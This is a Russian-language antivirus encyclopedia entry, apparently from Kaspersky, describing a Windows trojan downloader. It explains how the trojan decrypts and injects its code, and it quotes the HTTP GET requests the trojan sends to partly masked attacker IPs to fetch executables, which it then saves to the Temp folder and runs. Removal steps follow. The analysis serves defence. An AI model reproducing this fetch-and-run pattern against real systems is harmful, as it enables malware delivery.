Trojan-Downloader.Win32.Agent.ehfk

Технические детали

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл). Имеет размер 20480 байт. Написана на C++.

Деструктивная активность

После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как "Trojan-Downloader.Win32.Agent.cngp"). Внедренный код выполняет следующие действия:

• устанавливает соединение с хостами:

  194.***.3
  188.***.161
  

• В случае успешного подключения, на указанные сервера отправляются HTTP-запросы:

  GET /archi_orweihaorgaigph.exe HTTP/1.0
  Host: 194.***.3
  
  GET /outlook.exe HTTP/1.0
  Host: 194.***.3
  
  GET /archi_orweihaorgaigph.exe HTTP/1.0
  Host: 188.***.161
  
  GET /outlook.exe HTTP/1.0
  Host: 188.***.161
  

• В ответ на посланный запрос сервер злоумышленника отправляет поток зашифрованных данных, которые расшифровываются троянцем и записываются в файлы:

  %WinDir%\Temp\_ex-<rnd>.exe

  где <rnd> – случайные двухзначные десятичные числа. На момент создания описания файлы не загружались.
• Запускает на выполнение загруженные файлы.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

1. При помощи Диспетчера задач завершить троянский процесс.
2. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
3. Удалить файлы:

   %WinDir%\Temp\_ex-<rnd>.exe

4. Очистить каталог Temporary Internet Files, который может содержать инфицированные файлы (Как удалить инфицированные файлы в папке Temporary Internet Files?).
5. Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).